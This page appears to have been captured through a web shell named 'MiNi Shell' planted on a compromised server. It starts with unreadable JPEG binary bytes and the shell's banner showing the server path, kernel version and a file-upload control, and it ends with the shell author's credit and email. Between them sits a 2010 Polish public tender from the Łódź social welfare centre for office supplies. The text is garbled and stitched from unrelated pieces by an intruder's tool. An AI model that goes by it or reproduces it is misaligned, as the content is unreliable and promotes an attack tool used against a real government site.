JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20101003/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20101003/271901-N-2010.html

<p class="kh_header"><b>Łódź: Dostawa materiałów biurowych dla Miejskiego Ośrodka Pomocy Społecznej w Łodzi oraz jego 4 filii</b><br>
<b>Numer ogłoszenia: 271901 - 2010; data zamieszczenia: 03.10.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Społecznej w Łodzi , ul. Piotrkowska 149, 90-440 Łódź, woj. łódzkie, tel. 0-42 6324034, faks 0-42 6324130.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mops.lodz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa materiałów biurowych dla Miejskiego Ośrodka Pomocy Społecznej w Łodzi oraz jego 4 filii.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem niniejszego zamówienia jest dostawa do biura projektu Miejskiego Ośrodka Pomocy Społecznej w Łodzi oraz jego 4 filii następujących materiałów biurowych:

1. dla biura projektu Mops :

1)papier ksero Pol speed lub równoważny A-4 - 125 ryz,
2)segregator A4 75 mm. Niebieskie - 25 szt.,
3)segregator A4 50 mm. Niebieskie - 15 szt,
4)koszulka A-4 po 100 szt. - 5 opakowań,
5)segregator A4 75 mm. Czerwone - 5 szt.,
6)segregator A4 50 mm. Czerwone - 5 szt.,
7)półka na dokumenty przeżroczysta - 10 szt.,
8)skoroszyt twardy, zawieszany, niebieski - 55 szt.,
9)teczki tekturowe wiązane - 20 szt.,
10)przekładki do segregatorów, kolorowe - 1 opakowanie,
11)samoprzylepna kieszeń na CD 2 opakowania.,
12)kalendarz na biurko, kołowy, stojący z tygodniową kartą, miejscem na notatki - 5 szt,
13)ściereczki do czyszczenia monitora - 3 szt,
14) kostka żółta 8,5 x7,5 klejona - 22 szt,
15)Powietrze próżniowe w sprayu - 1 szt,
16) Koszulki A-4, poszerzane na katalogi po 10 szt. - 4 opakowania,
17)Podkładka pod biurko - 1 szt,
18)Płyty CD pakowane osobno - 70 szt,
19)Korektor w taśmie pentel lub równoważny  - 5 szt,
20) Korektor w piórze - 4 szt,
21) Znaczniki samoprzylepne Taurus trade lub równoważne 4 kolory - 12 szt,
22) Długopis czarny, czerwony, niebieski po 30 szt. - 90 szt,
23) Cienkopisy 3 różne kolory, po 2 opakowania z każdego koloru - 6 opakowań,
24)Rozszywacz - 2 szt, 
25)Temperówka z pojemnikiem - 2 szt,
1)Taśma samoprzylepna scotch magic  19x7,6 - 2 szt,
2) Kosz na śmieci, otwarty - 3 szt,
3) Spinacze biurowe okrągłe 50 mm 5  opakowań,
4)Spinacze biurowe okrągłe 28 mm - 5 opakowań,
5)Klips 19 mm - 3 opakowania,
6) Klips 25 mm - 3 opakowania,
7)Klips 32 mm - 3 opakowania,
8) Teczka preszpanowa z gumką, różne kolory - 10 szt,
9) Teczka gruba, tekturowa, gumka wzdłuż boku Active Jet lub równoważna - 4 szt,
10)Markery dwustronne - 3 szt,
11) Teczka z gumką Leitz Allura lub równoważna, grzbiet 30 mm - 2 szt,
12)Pojemnik magnetyczny ze spinaczami, metalowe 26 mmpo 100 szt w opakowaniu - 4 szt,
13)Zakreślacze 4 różne kolory - 4 komplety,
14)Tusz stemplarski Noris lub równoważny (czerwony, niebieski po 1 szt- 2 szt,
15) Kalkulator Citizen sdc-554s lub równoważny - 3 szt,
16) Grzbiety do bindowania, średnica 8 czarne - 20 szt,
17) Okładki do bindowania, karton niebieski - 20 szt,
18)Okładki do bindowania, przeżroczyste - 20 szt,
19) Lampa biurkowa halogenowa Spektra lub równoważna - 1 szt,
20) Tablica korkowa w drewnianej oprawie 90x180 - 1 szt,
21)Tablica korkowa w drewnianej oprawie 40x60 - 1 szt,
22) Pinezki kolorowe - 60 szt w opakowaniu,
23)Blok makulaturowy A4 - 10 szt,
24)Brulion w twardej oprawie A4 - 5 szt,
25) Zeszyt menadżerski typu Leitz Vivano lub równoważny, 80 k - 3 szt,
26)kołonotatnik Grand lub równoważny A4 100 kartkwy - 3 szt
27)podkładki pod mysz żelowe bez poduszek - 3 szt,
28)teczki do podpisu (czerwony czarny) - 2 szt,
29)pojemnik na katalogi Leitz plus lub równoważny kolor niebieski - 5 szt
30)samoprzylepne zakładki indeksujące wąskie, 4 kolory po 35 szt - 2 szt
31)organizer - 1 szt,
32)składany pojemnik papierowy na dokumenty, szeroki grzbiet - 50 szt
33)obwoluta z zamknięciem narożnym np Elba lub równoważna - 1 szt,
34)segregator plastikowy do przechowywania płyt CD - 1 szt
35)torby na dokumenty z uchwytem z materiału - 4 szt,
36)płyn do czyszczenia ekranu fellowes lub równoważny - 1 szt,
37)skoroszyt A4 miękki z paskiem brzegowym do wpinania kartek - 1 szt
38)okładki sztywne na dyplomy - 500 szt,
39)lampka na biurko z pokrętłem jasności - 1 szt,
40)nożyczki biurowe precyzyjne  3 szt,
   
2. dla 4 filii 

LP
Asortyment
ŚR 
W
B
G
Łącznie ilości dla filii
Wartość
1
Papier ksero A4 - ryz
360
130
250
360
1100

2
Segregator A4 50 mm, niebieskie
100
58
40
50
248

3
Segregator A4 75 mm, niebieskie
x
6
40
20
66

4
Koszulka A4 - opakowań
100
80
60
45
285

5
Obwoluta A4 z klapką - sztuk
x
x

31
31

6
Skoroszyt plastikowy z wąsem z zawieszką - sztuk
200
270
60
200
730

7
Skoroszyt plastikowy z wąsem  sztywny grzbiet - sztuk
x
x
60
140
200

8
Skoroszyt A4 papierowy- sztuk
250
x
x
x
250

9
Blok szkolny A 5 100 kart. -sztuk
x
2
165
260
427

10
Blok szkolny A 4 100 kart. - sztuk
100
15
170
85
370

11
Album ofertowy A4 - sztuk
x
x
x
15
15

12
Kostka kolorowa - sztuk
x
48
100
100
248

13
Teczka A4 plastik kolor na gumkę - sztuk
x
160
40
30
230

14
Teczka z gumką A4 z grubej tektury (różne kolory)- sztuk
100
70
180
200
550

15
Ofertówka A4 L twarda - sztuk
x
x
x
100
100

16
Korektor w taśmie -sztuk
x
17
50
10
77

17
Długopis Pentel lub równoważny (niebieskie i czarne) - sztuk
220
142
150
190
702

18
Długopis Pentel z klipem lub równoważny- sztuk
x
x
15
50
65

19
Cienkopisy kolorowe- opakowanie po 4 sztuki kolor
40
24
35
25
124

20
Tekstmarker kolor - sztuk
100
x
30
82
212

21
Wkład Pentel lub równoważny (niebieskie, czarne) - sztuk
180
60
150
180
570

22
Notes z klejem 38 51 - sztuk
x
x
10
100
110

23
Notes z klejem 75 75 - sztuk
x
x
10
120
130

24
Marker permanentny - sztuk
x
x
10
36
46

25
Spinacz biurowy trójkątny - opakowań
200
x
40
115 
355

26
Zszywki - opakowań
200
x
10
220
430

27
Klips 25 mm kolorowe - opakowań
100
x
30
66
196

28
Klips 32 mm kolorowe - opakowań
x
x
30
20
50

29
Pionowe stojaki metalowe rozdzielające teczki - sztuk
x
x
x
80
80

30
Nożyczki 20 cm -sztuk
10
8
10
2
30

31
Teczka  harmonijkowa z przegródkami z folii - sztuk
x
x
5
45
50

32
Ołówki automatyczne - sztuk
x
x
20
45
65

33
Rysiki do ołówków atomat. - opakowań
x
x
15
45
60

34
Chusteczki do czyszczenia komp. nawilżone - opakowań
x
x
15
10
25

35
Rozszywacze - sztuk
x

25
20
45

36
Ofertówka  A5 - sztuk
x


80
80

37
Zeszyty A5, 96 kartek, sztywna oprawa - sztuk
100
x
10
20
130

38
Cienkopisy kulkowe kolor - sztuk
x
x
40
80
120

39
Brulion96 kart A4 twarda oprawa - sztuk
50
8
40
60
158

40
Gumki Pentel lub równoważne- sztuk
15
11
45
70
141

41
Taśma przezroczysta klejąca - sztuk
x
x
40
15
55

42
Teczka skrzydłowa z gumką, szeroki grzbiet - sztuk
x
x
x
44
44

43
Temperówki - sztuk
x
x
25
10
35

44
Teczki kopertowe plastikowe na zatrzask 
x
x
x
25
25

45
Podkładki na biurko antypoślizgowe, przezroczyste, 50x65 - sztuk
30
2
15
5
52

46
Skoroszyt A4 miękki z paskiem brzegowym do wpinania kartek - sztuk
x
x
10
x
10

47
Karteczki samoprzylepne kostki (8,5x7,5)  - sztuk
100
16
65
x
181

48
Karteczki samoprzylepne  paski - sztuk
x
x
10
x
10

49
Zszywacz 
50
12
15
x
77

50
Kalulator Citizen sdc 554s lub równoważny
x
17
10
x
27

51
Dziurkacz duży 
x
5
4
x
9

52
Zakreślacze kolorowe - sztuk
x
5
5
x
10

53
Uchwyty  do dokumentów - sztuk
x
2
x
x
2

54
Podajnik do bloczków samoprzylepnych - sztuk
x
6
5
x
11

55
Tusz do stempli gumowych - sztuk
x
4
2
x
6

56
Tusz do stempli metalowych - sztuk
x
2
2
x
4

57
Podajnik do taśmy -sztuk
x
2
x
x
2

58
Przekładki kartonowe do segregatorów A4 - sztuk
x
40
30
x
70

59
Pojemnik magnetyczny na spinacze- sztuk
x
3
22
x
25

60
Datownik - sztuk
x
13
4
x
17

61
Kalendarz na biurko leżący - sztuk
x

30
40
70

62
Kalendarz na ścianę potrójny  - sztuk
x
14
5
26
45

63
Torby na dokumenty z uchwytem, z materiału
12
14
16
16 +14 (DD)
72

64
Półki plastikowe na biurko 3 poziomy
x
16
6
x
22

65
Pieczątka Za zgodność z oryginałem - sztuk
x
3
6
x
9

66
Cienkopisy kulkowe - sztuk
x
x
30
6
36

67
Teksmarkery skośne  różne kolory - sztuk
x
x
20
8
28

68
Notesy w sztywnej okładce - sztuk
x
x
30
x
30

69
Mazaki  (4 kolory) - opakowań
100
14
30
x
144

70
Długopisy żelowe - sztuk
x
20
x
x
20

71
Wkłady żelowe - sztuk
x
44
x
x
44

72
Pióra na naboje - sztuk
x
7
x
x
7

73
Naboje niebieskie do pióra - opakowań
x
14
x
x
14

74
Korektor płynny - sztuk
x
10
20
x
30

75
Zszywki - opakowań
x
10
x
x
10

76
Lampki na biurko - sztuk
x
2
4
x
6

77
Wkłady do Zenith - sztuk
x
30
x
x
30

78
Korektor w długopisie
x
9
5
x
14

79
Mapa Łodzi składana - sztuk
x
6
5
x
11

80
Wizytownik kołowy na biurko stojący - sztuk
x
3
x
x
3

81
Pudła kartonowe z przykrywkami - sztuk
x
6
20
x
26

82
Książki kodowe - sztuk
x
4
7
x
11

83
Literki-przekładki do kartotek - sztuk 
x
14
20
x
34

84
Ołówki  zwykłe z gumką -sztuk
100
10
70
x
180

85
Podstawki  do dokumentów - sztuk
x
2
2
x
4

86
Marker - opakowań
x
2
x
x
2

87
Piórnik biurowy - sztuk
20
x
x
x
20

88
Koperta C4, szara samoprzylepna - sztuk
220
x
x
x
220

89
Koperta C5, biała samoprzylepna - sztuk
220
x
x
x
220

90
Tablica korkowa 120x90 - sztuk
4
x
x
x
4

91
Pinezki beczułki - opakowań
20
x
x
x
20

92
Teczka do podpisywania spraw - sztuk
x
1
x
x
1.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.19.92.30-1, 30.19.76.44-2, 30.19.95.00-5, 22.85.00.00-3, 22.81.50.00-6, 30.19.21.60-0, 30.19.21.00-2, 30.19.21.30-1, 30.19.21.21-5, 30.19.72.20-4, 30.19.71.00-7, 39.24.10.00-3, 30.19.21.33-2, 30.19.73.20-5, 30.19.73.00-9, 30.14.12.00-1, 30.19.21.50-7, 30.19.97.92-8, 30.19.21.53-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 30.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie o spełnianiu warunków udziału w postępowaniu określonych w art. 22 ust. 1 u.p.z.p. - wg zał nr 2 do siwz</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie o spełnianiu warunków udziału w postępowaniu określonych w art. 22 ust. 1 u.p.z.p. - wg zał nr 2 do siwz</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie o spełnianiu warunków udziału w postępowaniu określonych w art. 22 ust. 1 u.p.z.p. - wg zał nr 2 do siwz</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie o spełnianiu warunków udziału w postępowaniu określonych w art. 22 ust. 1 u.p.z.p. - wg zał nr 2 do siwz</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie o spełnianiu warunków udziału w postępowaniu określonych w art. 22 ust. 1 u.p.z.p. - wg zał nr 2 do siwz</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mops.lodz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ośrodek Pomocy Społecznej w Łodzi ul. Piotrkowska 149, sekretariat, II piętro.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.10.2010 godzina 11:00, miejsce: Miejski Ośrodek Pomocy Społecznej w Łodzi ul. Piotrkowska 149, sekretariat, II piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Europejski Fundusz Społeczny, projekt Nowy obraz pomocy społecznej w Łodzi.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com